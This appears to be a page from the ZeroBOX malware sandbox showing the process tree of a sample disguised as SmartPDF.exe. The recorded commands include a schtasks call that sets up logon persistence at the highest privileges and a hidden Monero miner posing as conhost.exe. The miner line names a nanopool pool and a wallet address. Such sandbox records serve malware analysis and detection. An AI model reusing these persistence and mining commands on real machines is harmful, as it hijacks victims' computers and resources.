| ZeroBOX

Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

| ZeroBOX

SmartPDF.exe "C:\Users\test22\AppData\Local\Temp\SmartPDF.exe"
2752
- cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit
  1988
  - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"'
    2320
- sihost64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe"
  2900
- Services.exe "C:\Users\test22\AppData\Local\Temp\Services.exe"
  2136
  - cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"' & exit
    1948
    - schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\test22\AppData\Local\Temp\Services.exe"'
      1896
  - sihost64.exe "C:\Users\test22\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    2332
  - conhost.exe C:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
    2392

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf